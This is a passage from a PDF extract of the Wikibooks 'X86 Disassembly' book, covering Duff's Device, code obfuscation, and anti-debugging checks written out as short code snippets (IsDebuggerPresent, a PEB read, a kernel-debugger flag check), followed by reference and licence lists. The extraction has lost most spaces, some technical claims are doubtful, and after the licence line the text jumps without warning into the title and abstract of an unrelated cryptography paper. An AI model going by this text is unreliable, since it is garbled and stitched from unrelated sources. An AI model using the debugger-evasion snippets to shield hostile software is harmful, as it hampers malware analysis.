inside the switch statement? Two arrays of integers are
passedtothefunction,andateachiterationofthewhile
loop, 6 consecutive elements are copied from arrayB to
arrayA.Theswitchstatement,sinceitisoutsidethewhile
loop, only occurs at the beginning of the function. The
modulo is taken of the variable cnt with respect to 6. If
cnt is not evenly divisible by 6, then the modulo state-
mentisgoingtostarttheloopoffsomewhereinthemid-
dleoftherotation,thuspreventingtheloopfromcausing
abufferoverflowwithouthavingtotestthecurrentcount
aftereachiteration.
Duff’s Device is considered one of the more efficient
general-purpose methods for copying strings, arrays, or
datastreams.
5.3 CodeObfuscation
5.3.1 CodeObfuscation
Code Obfuscation is the act of making the assembly
codeormachinecodeofaprogrammoredifficulttodis-
assemble or decompile. The term “obfuscation” is typi-
callyusedtosuggestadeliberateattempttoadddifficulty,
butmanyotherpracticeswillcausecodetobeobfuscated
without that being the intention. Software vendors may
attempttoobfuscateorevenencryptcodetopreventre-
verseengineeringefforts. Therearemanydifferenttypes
68 CHAPTER 5. DIFFICULTIES
of obfuscations. Notice that many code optimizations
(discussed in the previous chapter) have the side-effect
ofmakingcodemoredifficulttoread, andthereforeop-
timizationsactasobfuscations.
5.3.2 WhatisCodeObfuscation?
Therearemanythingsthatobfuscationcouldbe:
Encryptedcodethatisdecryptedpriortoruntime.
Compressedcodethatisdecompressedpriortorun-
time.
Executables that contain Encrypted sections, and a
simpledecrypter.
Code instructions that are put in a hard-to read or-
der.
Code instructions which are used in a non-obvious
way.
Thischapterwilltrytoexaminesomecommonmethods
of obfuscating code, but will not necessarily delve into
methodstobreaktheobfuscation.
5.3.3 Interleaving
OptimizingCompilerswillengageinaprocesscalled in-
terleaving to try and maximize parallelism in pipelined
processors. Thistechniqueisbasedontwopremises:
1.Thatcertaininstructionscanbeexecutedoutofor-
derandstillmaintainthecorrectoutput
2.That processors can perform certain pairs of tasks
simultaneously.
x86NetBurstArchitecture
TheIntelNetBurstArchitecture dividesanx86proces-
sorinto2distinctparts: thesupportinghardware,andthe
primitive core processor. The primitive core of a pro-
cessor contains the ability to perform some calculations
blindingly fast, but not the instructions that you or I am
familiar with. The processor first converts the code in-
structions into a form called “micro-ops” that are then
handledbytheprimitivecoreprocessor.
The processor can also be broken down into 4 compo-
nents, ormodules, eachofwhichiscapableofperform-
ing certain tasks. Since each module can operate sepa-
rately, up to 4 separate tasks can be handled simultane-
ouslybytheprocessorcore,solongasthosetaskscanbe
performedbyeachofthe4modules:Port0Double-speed integer arithmetic, floating point
load,memorystore
Port1Double-speed integer arithmetic, floating point
arithmetic
Port2memoryread
Port3memorywrite(writestoaddressbus)
Soforinstance,theprocessorcansimultaneouslyperform
2integerarithmeticinstructionsinbothPort0andPort1,
so a compiler will frequently go to great lengths to put
arithmeticinstructionsclosetoeachother. Ifthetimingis
justright,upto4arithmeticinstructionscanbeexecuted
inasingleinstructionperiod.
Notice however that writing to memory is particularly
slow (requiring the address to be sent by Port3, and the
data itself to be written by Port0). Floating point num-
bers need to be loaded to the FPU before they can be
operated on, so a floating pointload anda floating point
arithmeticinstructioncannotoperateonasinglevaluein
asingleinstructioncycle. Therefore,itisnotuncommon
toseefloatingpointvaluesloaded,integervaluesbema-
nipulated, and then the floating point value be operated
on.
5.3.4 Non-IntuitiveInstructions
Optimizingcompilersfrequentlywilluseinstructionsthat
arenotintuitive. Someinstructionscanperformtasksfor
whichtheywerenotdesigned, typicallyasahelpfulside
effect. Sometimes, one instruction can perform a task
morequicklythanotherspecializedinstructionscan.
The only way to know that one instruction is faster than
anotheristoconsulttheprocessordocumentation. How-
ever,knowingsomeofthemostcommonsubstitutionsis
veryusefultothereverser.
Here are some examples. The code in the first box op-
erates more quickly than the one in the second, but per-
formsexactlythesametasks.
Example1
Fast
xoreax,eax
Slow
moveax,0
Example2
Fast
shleax,3
5.3. CODE OBFUSCATION 69
Slow
push edx push 8 mul dword [esp] add esp, 4 pop edx ;#
edxisnotpreservedby“mul”
Sometimessuchtransformationscouldbemadetomake
theanalysismoredifficult:
Example3
Fast
push$next_instrjmp$some_function$next_instr:...
Slow
call$some_function
Example4
Fast
popeaxjmpeax
Slow
retn
CommonInstructionSubstitutions
leaTheleainstructionhasthefollowingform:
leadest,(XS:)[reg1+reg2*x]
WhereXSisasegmentregister(SS,DS,CS,etc...),reg1
is the base address, reg2 is a variable offset, and x is a
multiplicative scaling factor. What lea does, essentially,
isloadthememoryaddressbeingpointedtointhesecond
argument,intothefirstargument. Lookatthefollowing
example:
moveax,1leaecx,[eax+4]
Now, what is the value of ecx? The answer is that ecx
has the value of (eax + 4), which is 5. In essence, lea is
usedtodoadditionandmultiplicationofaregisteranda
constantthatisabyteorless(  128to+127).
Now,consider:
moveax,1leaecx,[eax+eax*2]
Now,ecxequals3.
Thedifferenceisthatleaisquick(becauseitonlyaddsa
registerandasmallconstant),whereasthe addandmul
instructions are more versatile, but slower. lea is used
forarithmeticinthisfashionveryfrequently, evenwhen
compilersarenotactivelyoptimizingthecode.
xorThexorinstructionperformsthebit-wiseexclusive-or operation on two operands. Consider then, the
followingexample:
moval,0xAAxoral,al
Whatdoesthisdo? Letstakealookatthebinary:
10101010 ;10101010 = 0xAA xor 10101010 --------
00000000
The answer is that “xor reg, reg” sets the register to 0.
Moreimportantly,however,isthat“xoreax,eax”setseax
to0faster(andthegeneratedcodeinstructionissmaller)
thananequivalent“moveax,0”.
movedi,edi On a 64-bit x86 system, this instruction
clearsthehigh32-bitsoftherdiregister.
shl,shrleft-shifting,inbinaryarithmetic,isequivalent
to multiplying the operand by 2. Right-shifting is
alsoequivalenttointegerdivisionby2,althoughthe
lowestbitisdropped. ingeneral,left-shiftingby N
spacesmultipliestheoperandby 2N,andrightshift-
ingbyNspacesisthesameasdividingby 2N. One
importantfactisthatresultingnumberisaninteger
withnofractionalpartpresent. Forexample:
moval,31;00011111shral,1;00001111=15,not15.5
xchgxchgexchangesthecontentsoftworegisters,ora
registerandamemoryaddress. Anoteworthypoint
isthefactthatxchgoperatesfasterthanamovein-
struction. Forthisreason,xchgwillbeusedtomove
a value from a source to a destination, when the
valueinthesourcenolongerneedstobesaved.
Asanexample,considerthiscode:
movebx,eaxmoveax,0
Here, the value in eax is stored in ebx, and then eax is
loaded with the value zero. We can perform the same
operation,butusingxchgandxorinstead:
xchgeax,ebxxoreax,eax
Itmaysurpriseyoutolearnthatthesecondcodeexample
operatessignificantlyfasterthanthefirstonedoes.
5.3.5 Obfuscators
There are a number of tools on the market that will au-
tomate the process of code obfuscation. These products
willuseanumberoftransformationstoturnacodesnip-
pet into a less-readable form, although it will not affect
theprogramflowitself(althoughthetransformationsmay
increasecodesizeorexecutiontime).
70 CHAPTER 5. DIFFICULTIES
5.3.6 CodeTransformations
Codetransformationsareawayofreorderingcodesothat
itperformsexactlythesametaskbutbecomesmoredif-
ficulttotraceanddisassemble. Wecanbestdemonstrate
thistechniquebyexample. Let’ssaythatwehave2func-
tions,FunctionAandFunctionB.Bothofthesetwofunc-
tions are comprised of 3 separate parts, which are per-
formedinorder. Wecanbreakthisdownassuch:
FunctionA() { FuncAPart1(); FuncAPart2(); FuncA-
Part3(); } FunctionB() { FuncBPart1(); FuncBPart2();
FuncBPart3();}
And we have our main program, that executes the two
functions:
main(){FunctionA();FunctionB();}
Now, we can rearrange these snippets to a form that is
muchmorecomplicated(inassembly):
main: jmpFAP1FBP3: callFuncBPart3jmpendFBP1:
callFuncBPart1jmpFBP2FAP2: callFuncAPart2jmp
FAP3 FBP2: call FuncBPart2 jmp FBP3 FAP1: call
FuncAPart1 jmp FAP2 FAP3: call FuncAPart3 jmp
FBP1end:
As you can see, this is much harder to read, although it
perfectlypreservestheprogramflowoftheoriginalcode.
This code is much harder for a human to read, although
itisn'thardatallforanautomateddebuggingtool(such
asIDAPro)toread.
5.3.7 OpaquePredicates
AnOpaquePredicate isapredicateinsidethecode,that
cannotbeevaluatedduringstaticanalysis. Thisforcesthe
attackertoperformadynamicanalysistounderstandthe
result of the line. Typically this is related to a branch
instruction that is used to prevent in static analysis the
understandingwhichcodepathistaken.
5.3.8 CodeEncryption
Code can be encrypted, just like any other type of data,
except that code can also work to encrypt and decrypt
itself.Encrypted programs cannot be directly disassem-
bled. However, such a program can also not be run di-
rectly because the encrypted opcodes cannot be inter-
pretedproperlybytheCPU.Forthisreason,anencrypted
programmustcontainsomesortofmethodfordecrypt-
ingitselfpriortooperation.
Themostbasicmethodistoincludeasmallstubprogram
that decrypts the remainder of the executable, and then
passescontroltothedecryptedroutines.DisassemblingEncryptedCode
To disassemble an encrypted executable, you must first
determinehowthecodeisbeingdecrypted. Codecanbe
decryptedinoneoftwoprimaryways:
1.Allatonce. Theentirecodeportionisdecryptedin
a single pass, and left decrypted during execution.
Using a debugger, allow the decryption routine to
runcompletely, andthendumpthedecryptedcode
intoafileforfurtheranalysis.
2.ByBlock. Thecodeisencryptedinseparateblocks,
where each block may have a separate encryption
key. Blocks may be decrypted before use, and re-
encrypted again after use. Using a debugger, you
can attempt to capture all the decryption keys and
then use those keys to decrypt the entire program
at once later, or you can wait for the blocks to be
decrypted,andthendumptheblocksindividuallyto
aseparatefileforanalysis.
5.4 DebuggerDetectors
5.4.1 DetectingDebuggers
It may come as a surprise that a running program can
actually detect the presence of an attached user-mode
debugger. Also, there are methods available to detect
kernel-mode debuggers, although the methods used de-
pend in large part on which debugger is trying to be de-
tected.
This subject is peripheral to the narrative of this book,
andthesectionshouldbeconsideredanoptionalonefor
mostreaders.
5.4.2 IsDebuggerPresentAPI
TheWin32APIcontainsafunctioncalled“IsDebugger-
Present”,whichwillreturnabooleantrueiftheprogram
isbeingdebugged. Thefollowingcodesnippetwilldetail
ageneralusageofthisfunction:
if(IsDebuggerPresent()) {TerminatePro-
cess(GetCurrentProcess(),1);}
Of course, it is easy to spot uses of the IsDebuggerPre-
sent()functioninthedisassembledcode,andaskilledre-
verserwillsimplypatchthecodetoremovethisline. For
OllyDbg,therearemanypluginsavailablewhichhidethe
debuggerfromthisandmanyotherAPIs.
5.4. DEBUGGER DETECTORS 71
5.4.3 PEBDebuggerCheck
TheProcessEnvironmentBlockstoresthevaluethatIs-
DebuggerPresent queries to determine its return value.
To avoid suspicion, some programmers access the value
directly from the PEB instead of calling the API func-
tion. Thefollowingcodesnippetshowshowtoaccessthe
value:
mov eax, [fs:0x30] mov al, [eax+2] test al, al jne
@DebuggerDetected
5.4.4 KernelModeDebuggerCheck
OnWindows32and64-bitWin<XP?,7,8.1and10.
There is a structure called _KUSER_SHARED_DATA
atoffset0x2D4itcontainsthefieldnamed'KdDebugger-
Enabled'whichissetto0x03ifaKDMisactiveor0x00
ifnot.
Base address of the structure is static (0x7FFE0000)
acrossdifferentWindowsversionseven<XP.
The field is updated constantly with the last 2 bits set to
'11'bythekernel.
Thefollowingassemblyinstructionwillworkinboth32
and64-bitapplications:
cmpbyteptrds:[7FFE02D4],3je@DebuggerDetected
Thishasquiteafewadvantages. KnownSourceofinfor-
mation.
5.4.5 Timeouts
Debuggers can put break points in the code, and can
thereforestopprogramexecution. Aprogramcandetect
this, by monitoring the system clock. If too much time
has elapsed between instructions, it can be determined
thattheprogramisbeingstoppedandanalyzed(although
this is not always the case). If a program is taking too
muchtime,theprogramcanterminate.
Notice that on preemptive multithreading systems, such
as modern Windows or Linux systems will switch away
fromyourprogramtorunotherprograms. Thisiscalled
threadswitching. Ifthesystemhasmanythreadstorun,
orifsomethreadsarehoggingprocessortime,yourpro-
grammaydetectalongdelayandmayfalselydetermine
thattheprogramisbeingdebugged.
5.4.6 DetectingSoftICE
SoftICEisalocalkerneldebugger,andassuch,itcan'tbe
detected as easily as a user-mode debugger can be. The
IsDebuggerPresentAPIfunctionwillnotdetectthepres-
enceofSoftICE.TodetectSoftICE,thereareanumberoftechniquesthat
canbeused:
1.SearchfortheSoftICEinstalldirectory. IfSoftICE
is installed, the user is probably a hacker or a re-
verser.
2.Detectthepresenceof int1. SoftICEusesinterrupt
1 to debug, so if interrupt 1 is installed, SoftICEis
running.
5.4.7 DetectingOllyDbg
OllyDbgisapopular32-bitusermodedebugger. Unfor-
tunately, the last few releases, including the latest ver-
sion(v1.10)containavulnerabilityinthehandlingofthe
Win32APIfunctionOutputDebugString(). Aprogram-
mer trying to prevent his program from being debugged
by OllyDbg could exploit this vulnerability in order to
makethedebuggercrash. Theauthorhasneverreleased
a fix, however there are unofficial versions and plugins
available to protect OllyDbg from being exploited using
thisvulnerability.
Chapter6
ResourcesandLicensing
6.1 Resources
6.1.1 WikimediaResources
Wikibooks
X86Assembly
Subject:Assemblylanguages
CompilerConstruction
FloatingPoint
CProgramming
C++Programming
Wikipedia
6.1.2 ExternalResources
ExternalLinks
TheMASMProject: http://www.masm32.com/
RandallHyde’sHomepage: http://www.cs.ucr.edu/
~{}rhyde/
BorlandTurboAssembler: http://info.borland.com/
borlandcpp/cppcomp/tasmfact.html
NASM Project Homepage: http://nasm.
sourceforge.net/wakka.php?wakka=HomePage
FASMHomepage: http://flatassembler.net/
DCCDecompiler:
BoomerangDecompilerProject:
Microsoftdebuggingtoolsmainpage:
http://www.microsoft.com/whdc/devtools/
debugging/default.mspxSolarisobservationanddebuggingtoolsmainpage:
http://www.opensolaris.org/os/community/
dtrace/
http://www.opensolaris.org/os/community/
mdb/
FreeDebuggingTools,StaticSourceCodeAnalysis
Tools,BugTrackers
Microsoft Developers Network (MSDN): http://
msdn.microsoft.com
Gareth Williams: http:
//gareththegeek.ga.funpic.de/
B. Luevelsmeyer “PE Format Description": http://
www.cs.bilkent.edu.tr/~{}hozgur/PE.TXT PE for-
matdescription
TheirCorp “The Unofficial TypeLib Data Format
Specification": http://theircorp.byethost11.com/
index.php?vw=TypeLib
MSDNCallingConventionpage:
DictionaryofAlgorithmsandDataStructures
Charles Petzold’s Homepage: http://www.
charlespetzold.com/
DonaldKnuth’sHomepage: http://www-cs-faculty.
stanford.edu/~{}knuth/
“THE ISA AND PC/104 BUS” by Mark Sokos
2000
“Practically Reversing CRC” by Bas Westerbaan
2005
“CRCandhowtoReverseit” byanarchriz1999
“Reverse Engineering is a Way of Life” by Matthew
Russotto
“the Reverse and Reengineering Wiki”
F-Secure Khallenge III: 2008 Reverse Engineering
competition (isthisanannualchallenge?)
72
6.3. MANUAL OF STYLE 73
“BreakingEggsAndMakingOmelettes: TopicsOn
MultimediaTechnologyandReverseEngineering”
“ReverseEngineeringStackExchange”
Books
Yurichev, Dennis, “An Introduction To Reverse
Engineering for Beginners”. Online book: http:
//yurichev.com/writings/RE_for_beginners-en.pdf
Eilam, Eldad. “Reversing: Secrets of Reverse En-
gineering.” 2005. Wiley Publishing Inc. ISBN
0764574817
Hyde, Randall. “The Art of Assembly Language,”
NoStarch,2003 ISBN1886411972
Aho,AlfredV.etal. “Compilers: Principles,Tech-
niques and Tools,” Addison Wesley, 1986. ISBN:
0321428900
Steven Muchnick, “Advanced Compiler Design &
Implementation,” Morgan Kaufmann Publishers,
1997.ISBN1-55860-320-4
KernighanandRitchie, “TheCProgrammingLan-
guage”,2ndEdition,1988,PrenticeHall.
Petzold, Charles. “Programming Windows, Fifth
Edition,”MicrosoftPress,1999
Hart, Johnson M. “Win32 System Programming,
SecondEdition,”AddisonWesley,2001
Gordon, Alan. “COM and COM+ Programming
Primer,”PrenticeHall,2000
Nebbett, Gary. “Windows NT/2000 Native API
Reference,”Macmillan,2000
Levine, John R. “Linkers and Loaders,” Morgan-
Kauffman,2000
Knuth,DonaldE.“TheArtofComputerProgram-
ming,”Vol1,1997,AddisonWesley.
MALWARE: Fighting Malicious Code, by Ed Sk-
oudis;PrenticeHall,2004
Maximum Linux Security, Second Edition, byAnony-
mous;Sams,2001
6.2 Licensing
6.2.1 Licensing
Thisbookisreleasedunderthefollowinglicense:6.3 ManualofStyle
6.3.1 GlobalStylesheet
This book has a global stylesheet that can be loaded
for you. Go to the Gadgetstab atSpecial:Preferences ,
andactivatethe" Per-bookJavascriptandStylesheets "
gadget.
Chapter7
Textandimagesources,contributors,and
licenses
7.1 Text
Wikibooks:Collections Preface Source:https://en.wikibooks.org/wiki/Wikibooks%3ACollections_Preface?oldid=2842060 Contribu-
tors:RobinH,Whiteknight,Jomegat,Mike.lifeguard,MartinKraus,Adrignola,MageshaandMadKaw
X86Disassembly/Cover Source:https://en.wikibooks.org/wiki/X86_Disassembly/Cover?oldid=2595883 Contributors: Whiteknight,Ick-
toofayandAnonymous: 2
X86 Disassembly/Introduction Source:https://en.wikibooks.org/wiki/X86_Disassembly/Introduction?oldid=2370674 Contributors:
DavidCaryandWhiteknight
X86 Disassembly/Assemblers and Compilers Source:https://en.wikibooks.org/wiki/X86_Disassembly/Assemblers_and_Compilers?
oldid=3225389 Contributors: DavidCary, Panic2k4, AlbertCahalan, Whiteknight, Az1568, Gcaprino, Scientes, Sigma 7, Adrignola, Jf-
mantis,EleoTager,Artoria2e5,Syum90,HidayatsrfandAnonymous: 24
X86 Disassembly/Disassemblers and Decompilers Source:https://en.wikibooks.org/wiki/X86_Disassembly/Disassemblers_and_
Decompilers?oldid=3188078 Contributors: DavidCary,Mshonle,Panic2k4,AlbertCahalan,Quoth-22,Whiteknight,MikeVanEmmerik,
Koavf, Mdupont, 0xf001, Jkl, MichaelFrey, Svdb, Herbythyme, Macpunk, C1de0x, Ysangkok, Phatom87, Gannalech, SamB, Sponge-
bob88, QuiteUnusual, Afog, Adrignola, Duplode, JamesCrook, Voomoo, M.boli, Jfmantis, EleoTager, Artoria2e5, Chip Wildon Forster,
C4Decompiler,Aquynh,Andy80586,Xradonx,Sfrlz,MrexodiaandAnonymous: 102
X86 Disassembly/Disassembly Examples Source:https://en.wikibooks.org/wiki/X86_Disassembly/Disassembly_Examples?oldid=
1232569 Contributors: WhiteknightandAnonymous: 1
X86Disassembly/AnalysisTools Source:https://en.wikibooks.org/wiki/X86_Disassembly/Analysis_Tools?oldid=3094739 Contributors:
Utcursch, Panic2k4, Marcika, AlbertCahalan, Quoth-22, Whiteknight, Jomegat, Kaosone, Perpetuum~enwikibooks, Hagindaz, Wiki-
moder~enwikibooks, Dr Dnar, Macpunk, Frozen dude, AnthonyD~enwikibooks, Spongebob88, MohammadEbrahim, QuiteUnusual,
Jodell1,Adrignola,Jfmantis,KenMacD,Rohitab,Rotlink,Artoria2e5,IamMe3141andAnonymous: 65
X86 Disassembly/Microsoft Windows Source:https://en.wikibooks.org/wiki/X86_Disassembly/Microsoft_Windows?oldid=3137993
Contributors: Panic2k4, Quoth-22, Whiteknight, Hexed321, Chazz, Mantis~enwikibooks, Wj32, Gcaprino, Adrignola, Dennis714,
Gary600playsmc,Luis150902andAnonymous: 35
X86 Disassembly/Windows Executable Files Source:https://en.wikibooks.org/wiki/X86_Disassembly/Windows_Executable_Files?
oldid=3228330 Contributors: Quoth-22, Whiteknight, Shokuku, Barthax, Hexed321, DrDnar, Gcaprino, Chris.digiamo, VanderHoorn,
Adrignola,LaZ0r,EroCarrera,Ashpilkin,Self~enwikibooks,CallumPoole,Luis150902,Cwilson2016andAnonymous: 33
X86Disassembly/Linux Source:https://en.wikibooks.org/wiki/X86_Disassembly/Linux?oldid=2027237 Contributors: Whiteknight, Dr
Dnar,Gcaprino,RecentRunes,MohammadEbrahim,Adrignola,Swatnio~enwikibooksandAnonymous: 10
X86 Disassembly/Linux Executable Files Source:https://en.wikibooks.org/wiki/X86_Disassembly/Linux_Executable_Files?oldid=
2748762 Contributors: Orderud, Whiteknight, Ddouthitt, Gcaprino, ChrisR~enwikibooks, Ulf Abrahamsson~enwikibooks, Artoria2e5
andAnonymous: 2
X86 Disassembly/The Stack Source: https://en.wikibooks.org/wiki/X86_Disassembly/The_Stack?oldid=2622875 Contributors:
Whiteknight,DrDnar,Swift,Mantis~enwikibooks,Gcaprino,Gannalech,Jsvcycling,Jfmantis,X-Fi6andAnonymous: 17
X86 Disassembly/Functions and Stack Frames Source:https://en.wikibooks.org/wiki/X86_Disassembly/Functions_and_Stack_
Frames?oldid=3064266 Contributors: Whiteknight, Hagindaz, Mantis~enwikibooks, Gcaprino, Gannalech, Svick, Jfmantis and Anony-
mous: 26
X86 Disassembly/Functions and Stack Frame Examples Source:https://en.wikibooks.org/wiki/X86_Disassembly/Functions_and_
Stack_Frame_Examples?oldid=2759822 Contributors: Whiteknight,NipplesMeCool,JfmantisandAnonymous: 2
X86Disassembly/CallingConventions Source:https://en.wikibooks.org/wiki/X86_Disassembly/Calling_Conventions?oldid=3212707
Contributors: DavidCary, Whiteknight, Mantis~enwikibooks, Gcaprino, Sigma 7, Timjr~enwikibooks, Crazy Ivan, Jfmantis and Anony-
mous: 22
74
7.2. IMAGES 75
X86 Disassembly/Calling Convention Examples Source:https://en.wikibooks.org/wiki/X86_Disassembly/Calling_Convention_
Examples?oldid=2699639 Contributors: Cspurrier,Whiteknight,Spongebob88,NipplesMeCoolandAnonymous: 13
X86 Disassembly/Branches Source: https://en.wikibooks.org/wiki/X86_Disassembly/Branches?oldid=2739113 Contributors:
Whiteknight,Chazz,Mantis~enwikibooks,Leonus~enwikibooks,Gcaprino,Gannalech,Spongebob88,AdrignolaandAnonymous: 11
X86Disassembly/BranchExamples Source:https://en.wikibooks.org/wiki/X86_Disassembly/Branch_Examples?oldid=1791851 Con-
tributors:Whiteknight,NipplesMeCool,JasonLee~enwikibooksandAnonymous: 3
X86 Disassembly/Loops Source:https://en.wikibooks.org/wiki/X86_Disassembly/Loops?oldid=3014964 Contributors: Whiteknight,
Mantis~enwikibooks,Gcaprino,Justyna.ilczukandAnonymous: 5
X86Disassembly/LoopExamples Source:https://en.wikibooks.org/wiki/X86_Disassembly/Loop_Examples?oldid=1975904 Contribu-
tors:Whiteknight,Sz~enwikibooksandAnonymous: 4
X86 Disassembly/Variables Source: https://en.wikibooks.org/wiki/X86_Disassembly/Variables?oldid=3045584 Contributors:
Whiteknight,Mantis~enwikibooks,Gcaprino,Shnizzedy,Spongebob88andAnonymous: 6
X86 Disassembly/Variable Examples Source:https://en.wikibooks.org/wiki/X86_Disassembly/Variable_Examples?oldid=1480358
Contributors: WhiteknightandNipplesMeCool
X86Disassembly/DataStructures Source:https://en.wikibooks.org/wiki/X86_Disassembly/Data_Structures?oldid=3196446 Contribu-
tors:Whiteknight,Mantis~enwikibooks,Gcaprino,DirkHünniger,Hiroko103andAnonymous: 4
X86Disassembly/ObjectsandClasses Source:https://en.wikibooks.org/wiki/X86_Disassembly/Objects_and_Classes?oldid=2501049
Contributors: Whiteknight,Mantis~enwikibooks,Isaiah.v,DirkHünnigerandAnonymous: 6
X86Disassembly/FloatingPointNumbers Source:https://en.wikibooks.org/wiki/X86_Disassembly/Floating_Point_Numbers?oldid=
3121607 Contributors: Whiteknight,Gcaprino,Spongebob88,JackPotte,Abhi166~enwikibooks,JfmantisandAnonymous: 1
X86Disassembly/FloatingPointExamples Source:https://en.wikibooks.org/wiki/X86_Disassembly/Floating_Point_Examples?oldid=
1076115 Contributors: Whiteknight
X86 Disassembly/Code Optimization Source:https://en.wikibooks.org/wiki/X86_Disassembly/Code_Optimization?oldid=3162808
Contributors: Whiteknight,Silmethule,Gcaprino,Luis150902andAnonymous: 7
X86 Disassembly/Optimization Examples Source:https://en.wikibooks.org/wiki/X86_Disassembly/Optimization_Examples?oldid=
2676907 Contributors: Whiteknight,Wj32,I-VANNandAnonymous: 5
X86Disassembly/CodeObfuscation Source:https://en.wikibooks.org/wiki/X86_Disassembly/Code_Obfuscation?oldid=3087381 Con-
tributors:DavidCary,AlbertCahalan,Whiteknight,Wj32,Gcaprino,Adrignola,DirkHünniger,JamesCrook,Luis150902andAnonymous:
18
X86 Disassembly/Debugger Detectors Source:https://en.wikibooks.org/wiki/X86_Disassembly/Debugger_Detectors?oldid=3141472
Contributors: Orderud,Whiteknight,D0gg,Chris.digiamo,Luis150902andAnonymous: 4
X86Disassembly/Resources Source:https://en.wikibooks.org/wiki/X86_Disassembly/Resources?oldid=2578714 Contributors: David-
Cary,Whiteknight,Adrignola,CognoscentandAnonymous: 3
X86 Disassembly/Licensing Source: https://en.wikibooks.org/wiki/X86_Disassembly/Licensing?oldid=1075890 Contributors:
Whiteknight
X86Disassembly/ManualofStyle Source:https://en.wikibooks.org/wiki/X86_Disassembly/Manual_of_Style?oldid=1076917 Contrib-
utors:Whiteknight
7.2 Images
File:1Fh_01.png Source:https://upload.wikimedia.org/wikibooks/en/a/af/1Fh_01.png License:Fairuse Contributors: ?Original artist: ?
File:C_language_building_steps.png Source:https://upload.wikimedia.org/wikipedia/commons/b/b3/C_language_building_steps.png
License:CC-BY-SA-3.0 Contributors: ?Original artist: ?
File:C_language_do_while.png Source:https://upload.wikimedia.org/wikipedia/commons/2/21/C_language_do_while.png License:CC
BY3.0 Contributors: Ownwork Original artist: Thedsadude
File:C_language_for.png Source:https://upload.wikimedia.org/wikipedia/commons/5/51/C_language_for.png License:CCBY3.0 Con-
tributors:Ownwork Original artist: Thedsadude
File:C_language_if.png Source:https://upload.wikimedia.org/wikipedia/commons/f/fb/C_language_if.png License:CCBY3.0 Contrib-
utors:Ownwork Original artist: Thedsadude
File:C_language_if_else.png Source:https://upload.wikimedia.org/wikipedia/commons/a/ac/C_language_if_else.png License:CC BY
3.0Contributors: Ownwork Original artist: Thedsadude
File:C_language_linked_list.png Source:https://upload.wikimedia.org/wikipedia/commons/1/1b/C_language_linked_list.png License:
CCBY3.0 Contributors: Ownwork Original artist: Thedsadude
File:Data_stack.svg Source:https://upload.wikimedia.org/wikipedia/commons/2/29/Data_stack.svg License:Public domain Contribu-
tors:made in Inkscape, by myself User:Boivie . Based on Image:Stack-sv.png , originally uploaded to the Swedish Wikipedia in 2004 by
sv:User:Shrimp Original artist: User:Boivie
File:Elf-layout--en.svg Source:https://upload.wikimedia.org/wikipedia/commons/7/77/Elf-layout--en.svg License:CCBY-SA3.0 Con-
tributors:Ownwork Original artist: Surueña
File:Heckert_GNU_white.svg Source:https://upload.wikimedia.org/wikipedia/commons/2/22/Heckert_GNU_white.svg License:CC
BY-SA2.0 Contributors: gnu.org Original artist: AurelioA.Heckert <aurium@gmail.com>
76 CHAPTER 7. TEXT AND IMAGE SOURCES, CONTRIBUTORS, AND LICENSES
File:Hex_dump_of_the_Section_Table_in_a_64_bit_PE_File.jpg Source:https://upload.wikimedia.org/wikipedia/commons/3/3a/
Hex_dump_of_the_Section_Table_in_a_64_bit_PE_File.jpg License: CC BY-SA 4.0 Contributors: Own work Original artist:
Cwilson2016
File:Information_icon.svg Source:https://upload.wikimedia.org/wikipedia/commons/3/35/Information_icon.svg License:Public do-
mainContributors: en:Image:Informationicon.svg Original artist: ElT
File:Kernel-exo.svg Source:https://upload.wikimedia.org/wikipedia/commons/8/8f/Kernel-exo.svg License:CC-BY-SA-3.0 Contribu-
tors:self-made,basedon Image:Kernel-exo.png byUser:Aholstenson Original artist: Surachit
File:Resource_Section_Location_Example.jpg Source:https://upload.wikimedia.org/wikipedia/commons/e/e6/Resource_Section_
Location_Example.jpg License:CCBY-SA4.0 Contributors: Ownwork Original artist: Cwilson2016
File:RevEngDosHead.JPG Source:https://upload.wikimedia.org/wikipedia/commons/2/2f/RevEngDosHead.JPG License:Public do-
main Contributors: Transferred from en.wikibooks to Commons by Adrignola usingCommonsHelper .Original artist: Whiteknight at
EnglishWikibooks
File:RevEngPEFile.JPG Source:https://upload.wikimedia.org/wikipedia/commons/e/ea/RevEngPEFile.JPG License:Public domain
Contributors: Transferred from en.wikibooks to Commons by AdrignolausingCommonsHelper .Original artist: Whiteknight atEnglish
Wikibooks
File:RevEngPeSig.JPG Source:https://upload.wikimedia.org/wikipedia/commons/c/ca/RevEngPeSig.JPG License:Publicdomain Con-
tributors:Transferred from en.wikibooks ; transferred to Commons by User:Adrignola usingCommonsHelper .Original artist: Original
uploaderwas Whiteknight aten.wikibooks
File:ReverseEngineeringPop.JPG Source:https://upload.wikimedia.org/wikibooks/en/8/8c/ReverseEngineeringPop.JPG License:Pub-
licdomain Contributors: ?Original artist: ?
File:ReverseEngineeringPush.JPG Source:https://upload.wikimedia.org/wikibooks/en/9/98/ReverseEngineeringPush.JPG License:
Publicdomain Contributors: ?Original artist: ?
File:Tree-data-structure.svg Source:https://upload.wikimedia.org/wikipedia/commons/4/45/Tree-data-structure.svg License:GFDL
1.2Contributors: ?Original artist: ?
File:Wikibooks-logo-en-noslogan.svg Source:https://upload.wikimedia.org/wikipedia/commons/d/df/Wikibooks-logo-en-noslogan.
svgLicense:CCBY-SA3.0 Contributors: Ownwork Original artist: User:Bastique ,User:Ramac etal.
File:Wikipedia-logo.png Source:https://upload.wikimedia.org/wikipedia/commons/6/63/Wikipedia-logo.png License:GFDL Contrib-
utors:basedonthefirstversionoftheWikipedialogo,byNohat. Original artist: version1by Nohat(conceptby Paullusmagnus );
7.3 Contentlicense
CreativeCommonsAttribution-ShareAlike3.0Proofs as Cryptography:
a new interpretation of the Curry-Howard isomorphism
for software certificates
K. Amrit1, P.-A. Fouque2, T. Genet3and M. Tibouchi4
Abstract
The objective of the study is to provide a way to delegate a proof of a property to a possibly untrusted
agent and have a small certificate guaranteeing that the proof has been done by this (untrusted) agent. The
key principle is to see a property as an encryption key and its proof as the related decryption key. The
protocol then only consists of sending a nonce ciphered by the property. If the untrusted agent can prove
the property then he has the corresponding proof term ( λ-term) and is thus able to decrypt the nonce in
clear. By sending it back, he proves that the property has been proven without showing the proof. Expected
benefits include small certificates to be exchanged and the zero-knowledge proof schema which allows the
proof term to remain secret. External agents can only check whether a proof exists without having any
information about it. It can be of interest if the proof contains some critical information about the code
structure for instance.
1. École polytechnique, Paris
2. École normale supérieure, Paris
3. Université de Rennes 1, IRISA, Rennes
4. NTT Secure Platform Laboratories, Tokyo
1
hal-00715726, version 1 - 9 Jul 2012

Contents
1 Introduction 3
